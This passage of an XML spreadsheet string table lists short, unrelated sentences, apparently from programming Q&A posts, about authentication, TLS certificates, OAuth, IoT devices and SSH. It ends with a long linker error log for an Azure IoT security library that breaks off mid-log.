    <t>A helpful UNIX analogy is that you have at least r-x privileges on anything on the system, and you rwx in your home directory.</t>
  </si>
  <si>
    <t>Safari 6 is the latest installment to Apple's web browser Safari, which became available publicly July 25, 2012 with the release of OS X 10.8 Mountain Lion.</t>
  </si>
  <si>
    <t>The options for makecert can be found at
https://docs.microsoft.com/en-us/windows/desktop/seccrypto/makecert.</t>
  </si>
  <si>
    <t>Further, DACPAC doesn't copy user permissions or work with service broker or replication objects.</t>
  </si>
  <si>
    <t>RADIUS is Remote Authentication Dial In User Service, a protocol that allows for Authentication, Authorization and Accounting for its clients.</t>
  </si>
  <si>
    <t>Transparent proxy mode on OSX and Linux.</t>
  </si>
  <si>
    <t>HWIOAuthBundle adds support for authenticating users via OAuth (OAuth1.0a or OAuth2) in symfony2.</t>
  </si>
  <si>
    <t>Network monitoring app for networks managed on www.cloudtrax.com.</t>
  </si>
  <si>
    <t>At save, the model will validate itself and modify the database or in faliure it gives error messages.</t>
  </si>
  <si>
    <t>Source:
https://rubygems.org/gems/bcrypt-ruby</t>
  </si>
  <si>
    <t>WhyML is also used as an intermediate language for the verification of C, Java, or Ada programs.</t>
  </si>
  <si>
    <t>In v2.0 of the API, Facebook will begin to issus app-scoped user IDs when new users login to an instance of your app which is coded against v2.0 of the API.</t>
  </si>
  <si>
    <t>In addition, we use Apache Felix iPOJO to makes dynamism transparent.</t>
  </si>
  <si>
    <t>There have been several updates to HttpClient and some much-needed bugfixes like auth caching since the 4.0beta.</t>
  </si>
  <si>
    <t>Google Client Login allows developers to use other peoples login and password to access the data stored on Googles Servers on behalf of the user.</t>
  </si>
  <si>
    <t>Shut down:
On April 20, 2015 Google began the shut down for client login, on or around May 26, 2015 Google Analytics API, Google Drive API, and most of the other Google APIs no logger worked with client login.</t>
  </si>
  <si>
    <t>Once decoded, the URL can be used by any client with access to the internet.</t>
  </si>
  <si>
    <t>SSL/TLS certificates provisioned through AWS
  Certificate Manager are free.</t>
  </si>
  <si>
    <t xml:space="preserve">
The InterPlanetary File System is a hypermedia distribution protocol, addressed by content and identities.</t>
  </si>
  <si>
    <t>Wordpress 4.5.2
Wordpress 4.5.2 is a security release published in May 2016.</t>
  </si>
  <si>
    <t>SSL/TLS certificates provisioned through AWS Certificate Manager are free.</t>
  </si>
  <si>
    <t>express-validator is an express.js middleware library for HTTP requests validation and sanitization.</t>
  </si>
  <si>
    <t xml:space="preserve"> allows to request authentication from users through passphrases or biometrics.</t>
  </si>
  <si>
    <t>Later, TLS modified to run over connectionless protocols like UDP by way of Datagram Transport Layer Security (DTLS).</t>
  </si>
  <si>
    <t>The PEP Proxy gets the received token and validates it with Keyrock IdM.</t>
  </si>
  <si>
    <t>Applications can be developed to interact with the blockchain network on behalf of the users.</t>
  </si>
  <si>
    <t>.NET Framework (1.1 and later) managed version of the Rijndael (AES) cryptographic algorithm.</t>
  </si>
  <si>
    <t>JSSE stands for Java Secure Socket Extension.</t>
  </si>
  <si>
    <t>Message, suspend, and delete users when absolutely necessary.</t>
  </si>
  <si>
    <t>My mosquitto.conf: 
Password file is at the specified location and valid.</t>
  </si>
  <si>
    <t>On Android, there's more than one way to intercept the events from a user's interaction with your application.</t>
  </si>
  <si>
    <t>The keytool utility includes functions to generate keys, generate certificate signing requests, import and export keys and certificates, and delete keys and certificates from the keystore.</t>
  </si>
  <si>
    <t>I'm looking to create a script in python that initiates an SSH session with a server.</t>
  </si>
  <si>
    <t>These steps allowed me to create certificates that worked...</t>
  </si>
  <si>
    <t>If you are the root user, you have the super access right yet.</t>
  </si>
  <si>
    <t>So you first need to create ssh keys.</t>
  </si>
  <si>
    <t>You should create a password then for security.</t>
  </si>
  <si>
    <t>However with this SDK you can't hook into its IP stack, so you really have to do packet-analysis up-front.</t>
  </si>
  <si>
    <t>Also I had the IOTEdgeDevice set as the Parent Device of Leaf while creating it in portal and I had chosen the authentication to be symmetric to save myself all the manual X509 mess for testing purposes
The errors I'm getting from the edgeHub container logs are multiple.</t>
  </si>
  <si>
    <t>AWS SDK has another method to handle this problem:
AWSIoTManager.importIdentityFromPKCS12Data method
We need to convert the server response to PKCS12Data to use the generated certificate.</t>
  </si>
  <si>
    <t>You could also acquire the cookie by parsing the response, but the cookie is AES encrypted and that would be somewhat complicated.</t>
  </si>
  <si>
    <t>The IoT Hub service only checks that the thumbprint is valid, but doesn't do any chain validation.</t>
  </si>
  <si>
    <t>but when i run the app on the raspberry pi , i get an error while trying to upload the file : 
ex  {Microsoft.WindowsAzure.Storage.StorageException: Server failed to authenticate the request.</t>
  </si>
  <si>
    <t>After changing complete I have tried to login to device management console.</t>
  </si>
  <si>
    <t>I can replicate this error when i open a terminal as root user.</t>
  </si>
  <si>
    <t>automatic authentication of the user or ability to open tabs in the client.</t>
  </si>
  <si>
    <t>Like token detectors, reformatting doesn't prevent matches.</t>
  </si>
  <si>
    <t>Mozilla's policy regarding whitelisted plugins.</t>
  </si>
  <si>
    <t>I try to establish a spi communication from RPi (Master) to an EtherCAT Device (Slave).</t>
  </si>
  <si>
    <t>Furthurmore, after awhile it seems the Yun was disconnecting from the network, not accessible over http or ssh.</t>
  </si>
  <si>
    <t>Enables tracing and sends data to phone?</t>
  </si>
  <si>
    <t>I can access the site on my LAN no problem, but I get an error message when trying to access the site from a computer outside my network.</t>
  </si>
  <si>
    <t>This IOT Foundation recipe for Arduino Uno provides a way to connect to the MQTT server on Bluemix via the Ethernet client, but how can I do this using the Arduino Wifi shield with WPA secured wifi connection.</t>
  </si>
  <si>
    <t>i have stripped off most of the plugins on HiveMQ and left the message log plugin on HiveMQ aswell so i dont think its anything to do with authentication.</t>
  </si>
  <si>
    <t>Here is the full code of the reddit bot: https://github.com/Mjone77/Bitron
Is this a problem with OAuth2Util?</t>
  </si>
  <si>
    <t>The website allows only secured connection (HTTPS/SSL).</t>
  </si>
  <si>
    <t>I can't find a .Net UWP API to do this (WiFiAdapter seems to only facilitate connecting to networks that can be scanned for).</t>
  </si>
  <si>
    <t>I'm trying to secure the connection between the arduino pubsub client and mosquitto broker (which is running on a public server) over TLS.</t>
  </si>
  <si>
    <t>I have written a custom spamfilter in C# .NET 4.6 for personal use.</t>
  </si>
  <si>
    <t>There's some file outside the project directory that
is corrupted or out of date.</t>
  </si>
  <si>
    <t>I was thinking doing this by connecting to my Mac via ssh from my pi and then opening some sort of warning message on my mac.</t>
  </si>
  <si>
    <t>I now need to add Datagram level transport layer security (DTLS).</t>
  </si>
  <si>
    <t>As i have today the the problem with dri2 failing to authenticate.</t>
  </si>
  <si>
    <t>I learned that for a SSL (now TLS) connection you need to pass certificates to the server.</t>
  </si>
  <si>
    <t>Subsequently, I changed it to Cloud IoT Admin and even Project Editor permissions, but still saw the same error message.</t>
  </si>
  <si>
    <t>At IAM Management Console, I assigned the following permissions to my user:
AWSIoTThingsRegistration
AWSIoTLogging
AWSIoTConfigAccess
AWSIoTRuleActions
AWSIoTConfigReadOnlyAccess
AWSQuickSightIoTAnalyticsAccess
AWSIoTOTAUpdate
AWSIoTDataAccess
AWSIoTFullAccess
Still without success.</t>
  </si>
  <si>
    <t>The device certificates are part of a CA structure with two layers of certificate chain on top (i.e.</t>
  </si>
  <si>
    <t>I am trying to "transparently" intercept and modify incoming device messages.</t>
  </si>
  <si>
    <t>if i do not use a domain name for my server i cannot pay for a genuine ssl certificate.</t>
  </si>
  <si>
    <t>However, you don't need to use exception handling to make your code robust.</t>
  </si>
  <si>
    <t>Trying to be protective, would it not be possible to send request to the Arduino like you would any server using PHP APIs?</t>
  </si>
  <si>
    <t>Never post a password on a public website.</t>
  </si>
  <si>
    <t>You can also pass ssh a command to run :
If you want a full gui session, then you'll want to setup an RDP or VNC server on the rasp pi and connect to it with some client.</t>
  </si>
  <si>
    <t>Here is a post with some ideas of how to try to secure a Pi running Linux: https://raspberrypi.stackexchange.com/a/1250</t>
  </si>
  <si>
    <t>You only need bootable OS on microSD card with enabled ssh and could use wired network (or wireless network with wifi usb adapter).</t>
  </si>
  <si>
    <t>The difference between HTTP and HTTPS is that the latter is using SSL/TLS to secure the connection.</t>
  </si>
  <si>
    <t>Your password should look like this: 
In addition, there seems to be a problem at the the moment (march 2016) between mosquitto and Azure communication.</t>
  </si>
  <si>
    <t>You need to add security also if you will use simple socket for TCP/IP.</t>
  </si>
  <si>
    <t>If you think the token is compromised (somebody learnt it in any way), you can just change the token to a new one.</t>
  </si>
  <si>
    <t>The error is happening because you don't have permission to access the socket Docker is listening on unless you are root or are in the "docker" group.</t>
  </si>
  <si>
    <t>The Device Owner concept is also available on if there exists the device policy manager.</t>
  </si>
  <si>
    <t>It also allows you to make a secure MQTT connection.</t>
  </si>
  <si>
    <t>ssl and pthread is linked, because you provide ssl and pthread libraries compiled for gnueabihf architecture.</t>
  </si>
  <si>
    <t>Edit: Problem may have been the roots.pem wasn't on device to handle the TLS handshake with IoT Core.</t>
  </si>
  <si>
    <t>The MIC will be different for each device because it's base on the secret (and supposedly unique) master key (AppKey) shared between the device and the network.</t>
  </si>
  <si>
    <t>By defining that, you will get Authorization and Authentication for your gateway which should be placed in to your device.</t>
  </si>
  <si>
    <t>The fingerprint allows your client to confirm that the server is who it claims to be.</t>
  </si>
  <si>
    <t>This property contains the id of the device that sent the message and cannot be changed.</t>
  </si>
  <si>
    <t>Managed Only means that only .NET code is debugged and that native C/C++ code is ignored.</t>
  </si>
  <si>
    <t>I know when my raspberry pi says the password is wrong, and I know it's right, it's either still booting or it's failing to authenticate.</t>
  </si>
  <si>
    <t>Code page is another term for character encoding.</t>
  </si>
  <si>
    <t>The process of terminating an authenticated session.</t>
  </si>
  <si>
    <t>Basic authentication is a method for a web browser or other client program to provide a user name and password when making a request.</t>
  </si>
  <si>
    <t>LuaSec is a binding for OpenSSL library to provide TLS/SSL communication.</t>
  </si>
  <si>
    <t>FakeWeb is a helper for faking web requests in Ruby.</t>
  </si>
  <si>
    <t>Safari 8 is the latest version of Web browser developed by Apple Inc. and included with the OS X and iOS operating systems.</t>
  </si>
  <si>
    <t>Aspnet_regiis.exe is the ASP.NET IIS Registration Tool.</t>
  </si>
  <si>
    <t>Passport strategy for authenticating with Twitter using the OAuth 1.0a API.</t>
  </si>
  <si>
    <t>A user authentication/json web token management tool, built for Sails.</t>
  </si>
  <si>
    <t>Sockets are the most basic level of network communications.</t>
  </si>
  <si>
    <t>KMS keys and functionality are used by other AWS services, and you can use them to protect data in your own applications that use AWS.</t>
  </si>
  <si>
    <t>IPFS (InterPlanetary File System) is a distributed/P2P content and identity-addressed hypermedia distribution protocol.</t>
  </si>
  <si>
    <t>Similar to 403 Forbidden, but specifically for use when authentication is possible but has failed or not yet been provided.</t>
  </si>
  <si>
    <t>The HIDAPI source also provides a GUI test application which can enumerate and communicate with any HID device attached to the system.</t>
  </si>
  <si>
    <t>Project page: https://launchpad.net/django-openid-auth</t>
  </si>
  <si>
    <t>An application role is a database principal that enables an application to run with its own, user-like permissions.</t>
  </si>
  <si>
    <t>It is the de facto standard for mail gateway scanning.</t>
  </si>
  <si>
    <t>The main difference from Facebook is the ton of illegal content.</t>
  </si>
  <si>
    <t>FakeWeb is a helper for faking web requests in ruby.</t>
  </si>
  <si>
    <t>AccountManager can generate auth tokens for applications, so the application doesn't need to handle passwords directly.</t>
  </si>
  <si>
    <t>Since it was derived from SPF, Sender ID can also validate the MAIL FROM.</t>
  </si>
  <si>
    <t>When both sides have - mutually - authenticated each other, the connection is complete.</t>
  </si>
  <si>
    <t>This gives users an increase in both security and organization with their content.</t>
  </si>
  <si>
    <t>Here's an example of a binding in a privileged context:
Notice that ng-bind-html is bound to userHtml controlled by the user.</t>
  </si>
  <si>
    <t>Home page: https://security.appspot.com/vsftpd.html
About vsftpd
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux.</t>
  </si>
  <si>
    <t>as a test assertion)
What is MockServer Proxy
MockServer Proxy can be used for transparently recording all requests sent by a system (i.e.</t>
  </si>
  <si>
    <t>A special keyword like friend (C++) is usually used for authorizing such an access.</t>
  </si>
  <si>
    <t>RFC6242 and RFC7589 describe how they are utilized as secure NETCONF transport.</t>
  </si>
  <si>
    <t>Django OAuth Toolkit makes extensive use of the excellent OAuthLib, so that everything is rfc-compliant.</t>
  </si>
  <si>
    <t>This is used by Firebase for custom authentication token solutions.</t>
  </si>
  <si>
    <t>Standardized by IETF RFC 2560, the PKIX Online Certificate Status Protocol defines a protocol for requesting the revocation status of a digital certificate.</t>
  </si>
  <si>
    <t>All constants declated in TextArea are ignored with the exception of PASSWORD.</t>
  </si>
  <si>
    <t>This means that the compiler toolchain and the language runtime need not be trusted to be correct.</t>
  </si>
  <si>
    <t>The API can be used across platforms such as windows, mac, linux, ios, android or any other that can make HTTPS connections.</t>
  </si>
  <si>
    <t>I have been able to successfully authenticate and make a connection after not much work.</t>
  </si>
  <si>
    <t>I am currently developing an IoT Core app that should be only launched with protocol activation.</t>
  </si>
  <si>
    <t>I registered two device to IBM Cloud, and was issued each token value.</t>
  </si>
  <si>
    <t>Wired Equivalent Privacy (WEP) is a security algorithm for wireless networks.</t>
  </si>
  <si>
    <t>IdentityServer4 is an OpenID Connect Provider and OAuth 2.0 Authorization Server Framework built on ASP.NET Core.</t>
  </si>
  <si>
    <t>Have a sender device on my key chain and control it from there.</t>
  </si>
  <si>
    <t>I created ssh keys from my laptop to the raspberry so there is no password asking.</t>
  </si>
  <si>
    <t>And with the device ID I have created in Application of Balena in Raspberry monitor with Balena OS it is asking for login and password.</t>
  </si>
  <si>
    <t>You don't need to flash the firmware plus the SDK.</t>
  </si>
  <si>
    <t>The IV of the session key is reset to zero only ONCE when the key is created after authentication.</t>
  </si>
  <si>
    <t>Instead of using the IBM Blockchain, you should create your own Blockchain.</t>
  </si>
  <si>
    <t>&lt;Key&gt;-event:  952 590076031  Caps_Lock 65509 .</t>
  </si>
  <si>
    <t>you will create all the certificates you will need.</t>
  </si>
  <si>
    <t>A grunt library for SSH and SFTP tasks.</t>
  </si>
  <si>
    <t>huBarcode is a Python Library to generate 1D and 2D Barcodes.</t>
  </si>
  <si>
    <t>Digital Living Network Alliance (DLNA) creates guidelines for interoperability of multimedia devices.</t>
  </si>
  <si>
    <t>I have followed a bunch of other threads about this topic and think i am close, but getting a permission denied error.</t>
  </si>
  <si>
    <t>I still don't get a connection when I invoke the secret method createRfcommSocket(), which StackOverflow recommends to defeat that error.</t>
  </si>
  <si>
    <t>Watchdog setup that works on Pi running Stretch 12/17/18
Unlike some other suggestions on SO and the net, I did not need to install watchdog as a device on the Pi e.g.</t>
  </si>
  <si>
    <t>SSL V3 has reached end of life and has been deprecated in favor of Transport Layer Security (tls).</t>
  </si>
  <si>
    <t>(Source: https://askubuntu.com/questions/73864/how-to-modify-a-invalid-etc-sudoers-file-it-throws-out-an-error-and-not-allowi)</t>
  </si>
  <si>
    <t>If it is on a roll sending valid posts, I can reset/unplug and it will work still.</t>
  </si>
  <si>
    <t>Yes, you can request data for current matches by using the endpoint /lol/spectator/v4/active-games/by-summoner/{encryptedSummonerId}.</t>
  </si>
  <si>
    <t>I would like that, whenever any user (of any platform if possible) connects to my Wi-Fi, I ask him to accept a specific certificate, but I do not find a proper way or software to do this.</t>
  </si>
  <si>
    <t>Port 32 - Onewire32 
Main objective is that i want to know get the one-wire id at specific port.</t>
  </si>
  <si>
    <t>However WIOTP is unable to interpret the payload and basically tokenizes the values.</t>
  </si>
  <si>
    <t>Worth saying that arduino is away from the source and so is connected via a shielded wire to reject noise.</t>
  </si>
  <si>
    <t>Here is what I tried first:
On running this program I get:
RunTimeError: Conflicting edge detection already enabled for this GPIO channel.</t>
  </si>
  <si>
    <t>PS: I am using port 1883 and I have changed the service security to TLS optional.</t>
  </si>
  <si>
    <t>This following error occurs :
Capturing and displaying logcat messages from application.</t>
  </si>
  <si>
    <t>With this case, I can run a safe shutdown script which I've cloned from github: https://github.com/RetroFlag/retroflag-picase.</t>
  </si>
  <si>
    <t>I wanna catch probe requests of mobile devices that are not connected to a network using monitor mode on Raspberry pi 3.</t>
  </si>
  <si>
    <t>I don't have any idea about the http certificates but your log shows that your application is crashing because of  .</t>
  </si>
  <si>
    <t>However, there are also manufacturer-specific messages which are usually not documented for access by the public.</t>
  </si>
  <si>
    <t>This is the same reason that you wont be able to interface the console without a controller, the controller is used because it knows how to communicate with the security protocols.</t>
  </si>
  <si>
    <t>It has been my experience that when the I2C (wire.h) library is not properly connected to a device it can be blocking.</t>
  </si>
  <si>
    <t>A company, school or other institution may have policies about not scanning networks.</t>
  </si>
  <si>
    <t>While on the device itself this doesn't seem to be a problem, the result was that on AWS I had multiple certs associated to the device.</t>
  </si>
  <si>
    <t>You can find some other SSH libraries which could support .Net Standard 2.0/UAP 10.</t>
  </si>
  <si>
    <t>Activities to break into computer(s) or technology systems without authorized access.</t>
  </si>
  <si>
    <t>Payeezy is a framework used to accept payments in a mobile app or website.</t>
  </si>
  <si>
    <t>A perceptual hash is a fingerprint of a multimedia file derived from various features from its content.</t>
  </si>
  <si>
    <t>So you only have to remember one single master password or select the key file to unlock the whole database.</t>
  </si>
  <si>
    <t>The EME provides a JavaScript API that enables web applications to interact with content protection systems (e.g.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a library designed to stub your network requests very easily.</t>
  </si>
  <si>
    <t>Multiple column master keys allow for key rotation; periodically changing the key to enhance security.</t>
  </si>
  <si>
    <t>Tag used by Android in Security Alert messages to developers.</t>
  </si>
  <si>
    <t>In
MIDP 2.0, security domains protect
against unauthorized access of data,
applications and other network and
device resources by MIDlet suites on
the device.</t>
  </si>
  <si>
    <t>I'd like for it to work like a transparent gateway, but the gateway will offload the need for the device to implement the SDK and simply know of a contract that we decide beforehand.</t>
  </si>
  <si>
    <t>One might use a CookieContainer in conjunction with a CookieCollection object for persisting HTTP cookies between s and HttpWebResponses.</t>
  </si>
  <si>
    <t>All credential files are stored and located in the proper path (certs folder).</t>
  </si>
  <si>
    <t>Therefore capturing, storing, de-duplicating and verifying street addresses all pose challenges.</t>
  </si>
  <si>
    <t>I'm working on a security system with my raspberry pi and node-red.</t>
  </si>
  <si>
    <t>Or (Opera/Safari) will not pass those events to the DOM at all.</t>
  </si>
  <si>
    <t>The RTOS SDK docs have this sample C code:
Does NodeMCU expose any of this?</t>
  </si>
  <si>
    <t>I have created an IAM account, which has a username and password.</t>
  </si>
  <si>
    <t>I can not connect with AWS iot when I'm going to create new key and certificate.</t>
  </si>
  <si>
    <t>DeviceClient.Create(iotHubUri, new DeviceAuthenticationWithRegistrySymmetricKey("myDevice", deviceKey));</t>
  </si>
  <si>
    <t>I think you had the error when you tried to generate CA certificate.</t>
  </si>
  <si>
    <t>The certificates that I created are in us-east-1.</t>
  </si>
  <si>
    <t>I could get generated username from hue bridge.</t>
  </si>
  <si>
    <t>To do so you will need to SSH into the Pi and manually edit/create the file.</t>
  </si>
  <si>
    <t>There's a good chance that the value for your StringEquals condition does not match the value for your identity pool.</t>
  </si>
  <si>
    <t>User can choose multiple search results, which are displayed as token in UITextField.</t>
  </si>
  <si>
    <t>Catalyst also supports live-trading of crypto-assets starting with three exchanges (Bitfinex, Bittrex, and Poloniex)</t>
  </si>
  <si>
    <t>they will not validate in browsers and other systems with default SSL checking and key stores.</t>
  </si>
  <si>
    <t>PayPal express checkout is an API to allow eCommerce sites to accept payments with minimal effort from the customer.</t>
  </si>
  <si>
    <t>These TAs, which run in the Secure OS, communicate with the Client Applications (CAs), which run in the Rich OS, through a specific driver.</t>
  </si>
  <si>
    <t>It simply provides some boilerplate in case you want to use it later (consumer/token models, urls, etc.)</t>
  </si>
  <si>
    <t>I understand your "inherently distrusting" but these are not anonymously posted binaries but the work of the "swift on arm" community.</t>
  </si>
  <si>
    <t>- Why are strlcpy and strlcat considered insecure?</t>
  </si>
  <si>
    <t>If i try to compile the program with the Makefile I get the following errors
/bin/bash ../libtool  --tag=CXX   --mode=link g++ -Wall -Werror -Wformat-security -Wignored-qualifiers -Wlogical-op -Wmissing-include-dirs -Wpointer-arith -Wundef -Wduplicated-cond -Wshift-negative-value -Wshift-overflow=2 -Wfloat-conversion -Wsized-deallocation -Wlogical-not-parentheses -Wno-strict-aliasing -g -O2 -pipe -fno-implement-inlines  -O3   -o iotProcess iotProcess-iotProcess.o iotProcess-TMPMsgIot.o iotProcess-IotCloudComm.o iotProcess-MessageHandler.o iotProcess-jsonUtil.o /usr/local/lib/libiothub_client_mqtt_transport.a /usr/local/lib/libiothub_client_amqp_transport.a /usr/local/lib/libiothub_client_http_transport.a /usr/local/lib/libiothub_client.a /usr/local/lib/libumqtt.a /usr/local/lib/libprov_auth_client.a /usr/local/lib/libhsm_security_client.a /usr/local/lib/libuhttp.a /usr/local/lib/libaziotsharedutil.a ../common/libbpng.la ../configuration/libconfiguration.la ../common/tmpMsg/libtmpmsg.la ../common/util/libutil.la /opt/telemotive/lib/i686-linux-gnu/libtmtrace.la /opt/telemotive/lib/i686-linux-gnu/libtmutil.la /opt/telemotive/lib/i686-linux-gnu/libtmproc.la /opt/telemotive/lib/i686-linux-gnu/libtmio.la /opt/telemotive/lib/i686-linux-gnu/libtmpbus.la -lpthread -lcurl -lssl -lcrypto -lm -lxerces-c -luuid /usr/local/lib/libparson.a -lmscan_api -lmdis_api
libtool: link: g++ -Wall -Werror -Wformat-security -Wignored-qualifiers -Wlogical-op -Wmissing-include-dirs -Wpointer-arith -Wundef -Wduplicated-cond -Wshift-negative-value -Wshift-overflow=2 -Wfloat-conversion -Wsized-deallocation -Wlogical-not-parentheses -Wno-strict-aliasing -g -O2 -pipe -fno-implement-inlines -O3 -o .libs/iotProcess iotProcess-iotProcess.o iotProcess-TMPMsgIot.o iotProcess-IotCloudComm.o iotProcess-MessageHandler.o iotProcess-jsonUtil.o  /usr/local/lib/libiothub_client_mqtt_transport.a /usr/local/lib/libiothub_client_amqp_transport.a /usr/local/lib/libiothub_client_http_transport.a /usr/local/lib/libiothub_client.a /usr/local/lib/libumqtt.a /usr/local/lib/libprov_auth_client.a /usr/local/lib/libhsm_security_client.a /usr/local/lib/libuhttp.a /usr/local/lib/libaziotsharedutil.a ../common/.libs/libbpng.so ../configuration/.libs/libconfiguration.so ../common/tmpMsg/.libs/libtmpmsg.so ../common/util/.libs/libutil.so /opt/telemotive/lib/i686-linux-gnu/libtmtrace.so /opt/telemotive/lib/i686-linux-gnu/libtmutil.so /opt/telemotive/lib/i686-linux-gnu/libtmproc.so /opt/telemotive/lib/i686-linux-gnu/libtmio.so /opt/telemotive/lib/i686-linux-gnu/libtmpbus.so -lpthread /usr/lib/i386-linux-gnu/libcurl-gnutls.so -lssl -lcrypto -lm -lxerces-c -luuid /usr/local/lib/libparson.a -lmscan_api -lmdis_api -pthread
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `generate_root_ca_info':
hsm_client_riot.c:(.text+0xa6): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0xc4): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0xe6): undefined reference to `X509GetDeviceCertTBS'
hsm_client_riot.c:(.text+0x150): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x1b4): undefined reference to `X509MakeRootCert'
hsm_client_riot.c:(.text+0x239): undefined reference to `DERtoPEM'
hsm_client_riot.c:(.text+0x2e5): undefined reference to `X509GetDEREcc'
hsm_client_riot.c:(.text+0x34d): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `produce_device_cert':
hsm_client_riot.c:(.text+0x409): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0x426): undefined reference to `X509GetDeviceCertTBS'
hsm_client_riot.c:(.text+0x48e): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x4f3): undefined reference to `X509MakeDeviceCert'
hsm_client_riot.c:(.text+0x56e): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0x58b): undefined reference to `X509GetDERCsrTbs'
hsm_client_riot.c:(.text+0x5f3): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x658): undefined reference to `X509GetDERCsr'
hsm_client_riot.c:(.text+0x6c9): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0x6e6): undefined reference to `X509GetDeviceCertTBS'
hsm_client_riot.c:(.text+0x74e): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x7b0): undefined reference to `X509MakeDeviceCert'
hsm_client_riot.c:(.text+0x832): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `produce_alias_key_cert':
hsm_client_riot.c:(.text+0x8c6): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `produce_alias_key_pair':
hsm_client_riot.c:(.text+0x976): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0x9d9): undefined reference to `X509GetDEREcc'
hsm_client_riot.c:(.text+0xa4e): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `produce_device_id_public':
hsm_client_riot.c:(.text+0xb01): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0xb25): undefined reference to `X509GetDEREccPub'
hsm_client_riot.c:(.text+0xb9a): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `process_riot_key_info':
hsm_client_riot.c:(.text+0xcc8): undefined reference to `RiotCrypt_Hash'
hsm_client_riot.c:(.text+0xd3f): undefined reference to `RiotCrypt_DeriveEccKey'
hsm_client_riot.c:(.text+0xdb4): undefined reference to `RiotCrypt_Hash2'
hsm_client_riot.c:(.text+0xe31): undefined reference to `RiotCrypt_DeriveEccKey'
hsm_client_riot.c:(.text+0xf84): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0xfb1): undefined reference to `X509GetAliasCertTBS'
hsm_client_riot.c:(.text+0x101c): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x1084): undefined reference to `X509MakeAliasCert'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `hsm_client_x509_init':
hsm_client_riot.c:(.text+0x1295): undefined reference to `DiceSHA256'
hsm_client_riot.c:(.text+0x12b9): undefined reference to `DiceSHA256_2'
/usr/local/lib/libhsm_security_client.a(hsm_client_riot.c.o): In function `hsm_client_riot_create_leaf_cert':
hsm_client_riot.c:(.text+0x1c22): undefined reference to `DERInitContext'
hsm_client_riot.c:(.text+0x1c3f): undefined reference to `X509GetDeviceCertTBS'
hsm_client_riot.c:(.text+0x1cad): undefined reference to `RiotCrypt_Sign'
hsm_client_riot.c:(.text+0x1d15): undefined reference to `X509MakeDeviceCert'
hsm_client_riot.c:(.text+0x1de9): undefined reference to `DERtoPEM'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `GetEkTemplate':
hsm_client_tpm.c:(.text+0x1f): undefined reference to `ToTpmaObject'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `GetSrkTemplate':
hsm_client_tpm.c:(.text+0x95): undefined reference to `ToTpmaObject'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `dps_umarshal_array':
hsm_client_tpm.c:(.text+0x114): undefined reference to `UINT32_Unmarshal'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `unmarshal_array':
hsm_client_tpm.c:(.text+0x1f2): undefined reference to `UINT32_Unmarshal'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `marshal_array_values':
hsm_client_tpm.c:(.text+0x32b): undefined reference to `UINT32_Unmarshal'
hsm_client_tpm.c:(.text+0x452): undefined reference to `UINT32_Unmarshal'
hsm_client_tpm.c:(.text+0x579): undefined reference to `UINT32_Unmarshal'
hsm_client_tpm.c:(.text+0x6a2): undefined reference to `TPM2B_PUBLIC_Unmarshal'
hsm_client_tpm.c:(.text+0x742): undefined reference to `UINT16_Unmarshal'
hsm_client_tpm.c:(.text+0x7de): undefined reference to `TPM2B_PRIVATE_Unmarshal'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `create_tpm_session':
hsm_client_tpm.c:(.text+0x8a1): undefined reference to `TSS_StartAuthSession'
hsm_client_tpm.c:(.text+0x907): undefined reference to `TSS_PolicySecret'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `insert_key_in_tpm':
hsm_client_tpm.c:(.text+0xa94): undefined reference to `TPM2B_ID_OBJECT_Unmarshal'
hsm_client_tpm.c:(.text+0xaf4): undefined reference to `TPM2B_ENCRYPTED_SECRET_Unmarshal'
hsm_client_tpm.c:(.text+0xb54): undefined reference to `TPM2B_PRIVATE_Unmarshal'
hsm_client_tpm.c:(.text+0xbb4): undefined reference to `TPM2B_ENCRYPTED_SECRET_Unmarshal'
hsm_client_tpm.c:(.text+0xc13): undefined reference to `TPM2B_PUBLIC_Unmarshal'
hsm_client_tpm.c:(.text+0xc73): undefined reference to `UINT16_Unmarshal'
hsm_client_tpm.c:(.text+0xcee): undefined reference to `TPM2_ActivateCredential'
hsm_client_tpm.c:(.text+0xd7b): undefined reference to `TPM2_Import'
hsm_client_tpm.c:(.text+0xe2d): undefined reference to `ToTpmaObject'
hsm_client_tpm.c:(.text+0xecc): undefined reference to `TSS_Create'
hsm_client_tpm.c:(.text+0xf46): undefined reference to `TPM2_Load'
hsm_client_tpm.c:(.text+0xfb4): undefined reference to `TPM2_EvictControl'
hsm_client_tpm.c:(.text+0xfdc): undefined reference to `TPM2_EvictControl'
hsm_client_tpm.c:(.text+0x1036): undefined reference to `TPM2_FlushContext'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `decrypt_data':
